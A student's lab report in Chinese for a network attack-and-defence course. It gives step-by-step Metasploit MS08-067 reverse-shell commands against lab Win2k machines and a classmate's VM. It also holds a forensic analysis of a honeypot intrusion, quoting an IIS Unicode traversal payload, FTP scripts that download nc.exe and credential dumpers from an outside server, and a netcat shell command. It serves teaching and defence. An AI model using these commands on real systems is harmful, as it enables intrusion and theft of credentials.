20252903 2025-2026-2《网络攻防实践》第六周作业

一、核心知识点梳理

1.Metasploit Windows Attacker

Metasploit Windows Attacker 是基于 Metasploit 框架、针对 Windows 平台开展渗透测试的攻击套件，主要用于在授权环境下对 Windows 系统进行安全检测与漏洞验证。它集成了大量针对 Windows 远程服务、系统组件的漏洞利用模块，能够通过目标开放端口与已知漏洞发起攻击，配合 Meterpreter 等攻击载荷获取远程会话，实现文件管理、权限提升、屏幕监控、信息窃取等操作。

2.远程渗透攻击

远程渗透攻击是网络攻击中典型的非接触式入侵方式，攻击者依托网络链路，针对目标主机开放端口、系统漏洞、弱口令配置及应用缺陷发起突破，在不物理接触目标设备的前提下获取系统访问权限甚至完全控制。常见路径包括利用远程代码执行漏洞入侵、暴力破解远程管理服务、投递远控木马建立反向会话等。攻击过程通常包含信息探测、漏洞验证、权限获取与持久化驻留等环节，可实现数据窃取、指令控制、横向移动等破坏行为。

3.取证分析

取证技术是在保障原始数据完整性与真实性的前提下，对计算机、存储设备及系统运行环境中的电子数据进行固定、提取、解析与还原的技术手段。它主要分为内存取证与磁盘取证两大类，通过专业工具对进程信息、命令操作、文件结构、日志记录及加密数据进行深度分析，从而恢复删除内容、挖掘隐藏信息、还原设备操作行为与关键内容。

4.Windows NT 系统

Windows NT 系列在早期部署中安全设计存在明显短板，成为了内网渗透中常见的靶标系统。

二、实践过程

（1）动手实践Metasploit windows attacker

任务：使用metasploit软件进行windows远程渗透统计实验

具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

• 输入命令查看kali的IP地址为192.168.200.6；Win2k靶机的IP地址为：192.168.200.7
  
  
• 在kali输入命令msfconsole，进入msfconsole控制台页面
  
• 在msfconsole控制台页面输入命令search ms08_067查看漏洞 ms08_067的详细信息
  
• 输入如下命令进入漏洞所在文件
  use windows/smb/ms08_067_netapi
  
• 输入show options查看攻击此漏洞需要的设置
  
• 输入命令行show payloads查看有效的攻击载荷
  
• 首先输入set payload generic/shell_reverse_tcp，然后输入set RHOST 192.168.200.7，这是Win2k靶机的IP，接着输入set TARGET 0，自动选择靶机版本Exploit targets，最后输入exploit
  
• 会话连接> Command shell session 1 opened (192.168.200.6:4444 -> 192.168.200.7:1042)表示攻击机 192.168.200.6 的 4444 端口，成功接收到了靶机 192.168.200.7 的回连请求并且已经建立起稳定的命令行会话，
• C:\WINNT\system32>表示已经直接进入了靶机的系统目录，并拥有了最高级别的控制权限。
• 输入ver和ipconfig返回了靶机的信息，实验成功
  

（2）取证分析实践：解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。

1.攻击者使用了什么破解工具进行攻击

• 在kali上使用wireshark打开snort
  
• 输入过滤条件只显示源或目标 IP 是 172.16.1.106的流量
  ip.addr == 172.16.1.106 and http
  
• 发现117号包有异常流量信息，查阅资料后发现%C0%AF是IIS Unicode 路径遍历漏洞攻击的典型特征，其等价于向上一层目录的路径遍历。/guest/default.asp/../..%C0%AF../..%C0%AF../boot.ini
  解码后等价于
  /guest/../../../../boot.ini
  即从网站根目录向上跳 3 层，读取系统盘根目录的boot.ini文件
  
• 发现149号包有异常流量信息，打开后发现核心载荷是一条 POST 请求，其目标路径为/msadc/msadcs.dll/AdvancedDataFactory.Query，这正是MDAC RDS 远程代码执行漏洞中的 MS02-065 的标志性利用路径。
  
• 路径/msadc/msadcs.dll/AdvancedDataFactory.Query 是msadc.pl 工具针对 MS02-065 漏洞的标志性利用方式；同时，数据包中的 User-Agent: ACTIVEDATA、请求头结构，以及十六进制数据中出现的ADM!ROX!YOUR!WORLD特征字符串，也都是该工具生成的恶意请求的典型标识。

• 因此，判断攻击者使用了msadc.pl 工具

2.攻击者如何使用这个破解工具进入并控制了系统

• 查看182号数据，发现指令为cmd /c echo user johna2k > ftpcom，攻击者用 cmd.exe 执行命令，echo user johna2k 把 FTP 登录用户名写入文件，> ftpcom 把内容重定向到名为 ftpcom 的文件里
  
• 查看201号数据，发现指令为cmd /c echo hacker2000 > ftpcom，替换登录用户为新账号
  
• 查看220号数据，发现指令为cmd /c echo get samdump.dll > ftpcom，samdump.dll 是一款Windows系统凭证窃取工具，核心功能是读取目标服务器安全账户管理器数据库中的用户账户密码哈希值
  
• 查看239号数据，发现指令为cmd /c echo get pdump.exe > ftpcom，pdump.exe 是一款Windows进程内存转储工具，用于窃取系统敏感信息，转储 lsass.exe 进程内存，并从中提取用户账户的 NTLM 密码哈希
  
• 查看258号数据，发现指令为cmd /c echo get nc.exe > ftpcom，nc.exe用于建立反向 Shell，完全控制目标主机
  
• 查看277号数据，发现指令为cmd /c echo quit >> ftpcom，用于告诉 FTP 客户端传输完成后退出连接，结束脚本
  
• 查看296号数据，发现指令为cmd /c ftp -s:ftpcom -n www.nether.net，用于执行已构造好的 FTP 自动脚本
  
• 筛选ftp的流量，查看1106号数据表明攻击者在修正 FTP 登录凭证后，成功与恶意服务器建立有效会话
  
• 查看1233号数据，追踪TCP数据流发现cmd1.exe /c nc -l -p 6969 -e cmd1.exe，这表明攻击者连接了6969端口，绑定系统 cmd 命令行程序，实现反向 Shell 功能，获取了系统完全控制权。
  

综上，攻击者通过 msadc.pl 利用 IIS 漏洞执行系统命令，使用 echo 命令逐行构建 FTP 自动脚本 ftpcom，随后通过 ftp -s 自动连接恶意服务器下载 samdump.dll、pdump.exe、nc.exe 等工具，实现密码哈希导出、权限提升与后门反弹，最终获取系统完全控制权。

3.攻击者获得系统访问权限后做了什么

• 输入过滤条件tcp.port == 6969,查看1233号数据，追踪TCP数据流，查看到C:\Program Files\Common Files\system\msadc 目录，这是利用 MSADC/RDS 漏洞建立会话的初始目录
  
• 攻击者导航到 C:\根目录，查看了exploits目录及其子目录，并删除ftpcom等文件
  
• 攻击者两次执行 echo 命令，在 C:\ 根目录创建并写入了 README.NOW.Hax0r 文件。
  这句话的意思是：“嗨，我知道这是一台实验服务器，但还是请补好漏洞！😃”
  
• 攻击者执行net users和 net group，这里是在枚举系统用户和组，了解攻击面
  
• 攻击者执行net localgroup administrators ，查看管理员组成员，看到了系统存在 Administrator, Guest, IUSR_KENNY, IWAM_KENNY这几个账户
  
• 攻击者执行 net start查看正在运行的服务
  
• 攻击者执行net session，尝试查看会话，但是因为权限不足被拒绝
  
• 尝试执行 net users hi guy /ADD和 net user himan /ADD来添加新用户，但均失败
  
  
• 攻击者删除黑客工具samdump.dll、pdump.exe，删除fun、heh.txt、yay* 等测试文件，试图抹除攻击痕迹
  
  
  
• 攻击者运行密码抓取工具pdump，但提示权限不足，抓取失败
  
• 攻击者进入系统修复目录C:\WINNT\repair，目录存放着系统安装后或上次使用 rdisk /s命令更新时的注册表备份文件，其中的 SAM 包含本地用户账户的密码哈希，SECURITY 包含系统安全策略信息，SYSTEM 包含系统启动密钥，用于加密 SAM 文件，结合上一步我们可以判断这里攻击者企图获取密码哈希
  
  

综上，接入系统后，攻击者首先开展全面的环境侦察和嗅探，通过遍历磁盘目录结构、枚举用户账户、查询系统运行服务及本地权限组配置，摸排服务器整体运行状态；其次，攻击者调用本地密码抓取工具尝试读取系统账户哈希，同时进入系统修复目录，利用 rdisk 工具更新 SAM 注册表备份文件，意图通过离线解析方式破解系统账号密码；再次，攻击者试图通过新建系统账户的方式植入持久化后门，但受限于系统会话限制与权限管控，账户创建操作执行失败；此外，攻击者还留存了警示文档，也有可能是挑衅文档；最后，意识到入侵行为暴露风险后，攻击者主动删除目录内的密码抓取程序、提权工具等恶意文件，清理入侵工具痕迹

4.我们如何防止这样的攻击

我们想要防范此类利用系统漏洞与配置缺陷发起的入侵，第一是常态化修补系统高危漏洞，及时更新各类服务组件补丁，关闭服务器非必要的远程服务和闲置端口，从源头阻断漏洞利用的途径；第二是严格执行最小权限规范，合理划分各类业务账户权限，杜绝 IIS 匿名账号等低权限用户违规获取管理员权限，定期核查本地用户组配置，杜绝权限滥用问题。同时强化系统核心资源防护，对系统密码存储目录、关键注册表文件设置访问限制，管控命令行工具与陌生程序的运行权限，避免敏感信息被非法读取窃取；第三是日常开展日志审计，记录服务器操作与登录行为，便于及时察觉异常操作与入侵迹象。

5.你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？

攻击者大概率已经察觉目标为蜜罐主机。从攻击者全程行为的细节来看，攻击者完成漏洞利用拿下命令行后，仅停留在基础侦察与信息枚举阶段，在尝试新建后门账户失败后，没有更换其他持久化手段，反而主动删除本地攻击工具、清理操作痕迹，行为明显克制且谨慎，因此判断攻击者已经识别出环境异常，意识到这是用于捕获攻击行为的蜜罐设备。

（3）团队对抗实践：windows系统远程渗透攻击和分析。

两人的四台虚拟机都设置完成后，详细的信息如下：
20252903 刘瑞祺
攻击方：Kali（172.20.10.10）
防守方：Win2kServer（172.20.10.11）
20252908 石幸龙
攻击方：Kali（172.20.10.3）
防守方：Win2kServer（172.20.10.4）

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）

• 以桥接模式打开kali，与石幸龙连至同一热点下，其win2k的IP地址为172.20.10.4，在kali上查看能够ping通，开始对抗
  
• 在Kali中输入msfconsole，打开Metasploit控制台
  
• 输入命令，加载MS08-067漏洞的核心利用模块
  use exploit/windows/smb/ms08_067_netapi
  
• 输入命令，查看该漏洞的攻击载荷
  show payloads
  
• 输入命令set payload generic/shell_reverse_tcp ，设置反向TCP Shell载荷，然后输入命令set LHOST 172.20.10.10，set RHOST 172.20.10.4，分别对应攻击者ip和防守者ip
• 输入命令exploit进行攻击
• 发现已经进入了防御方Win2K的命令行，输入指令ipconfig -all查看靶机信息
  
• 输入命令mkdir lrq在对方主机中创建文件夹，输入命令cd lrq进入该文件夹，输入命令echo Your computer has been hacked by me—— 20252903 Liuruiqi :) >>Readme.txt在对方主机中创建一个Readme.txt文件并留言
  
• 在ip 172.20.10.4的Win2K靶机中查看到创建的文件夹以及对应的留言
  

防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

• 启动Kali的Wireshark，在对方攻击时进行监听，选中任一数据包打开follow，查看结果
  

查看到攻击者在目标主机命令行，在系统核心目录C:\WINNT\system32\sxl（第一次忘记记录了，于是多了一个sxl）下创建sxl子目录并进入，随后通过echo命令向Test.txt写入I am sxl 20252908

三、学习中遇到的问题及解决

1.当Win2k靶机的IP地址为：192.168.200.131时，出现了Rex::ConnectionRefused 错误，这表示靶机主动拒绝了连接请求。

解决方案：将Win2k靶机的网络适配器改为自定义VMnet8（NAT）模式，IP地址改为192.168.200.7

四、心得与体会

本次实验围绕 Windows 系统安全展开，对 Metasploit 远程渗透、网络流量取证及团队攻防对抗进行实操。实验依托 MS08-067 高危漏洞实施远程渗透，这也是我第一次攻击成功靶机，在这个过程中，我掌握了反向会话搭建的完整攻击流程和利用 Wireshark 对攻击流量进行分析，也成功在同学的主机上种下了自己的成果。这次实验夯实了我的渗透与攻击的实操能力，提升了我对于网络工具具体实践的了解，今后我也将继续深入学习面向更多系统、攻击方式更加多元的网络攻防技术。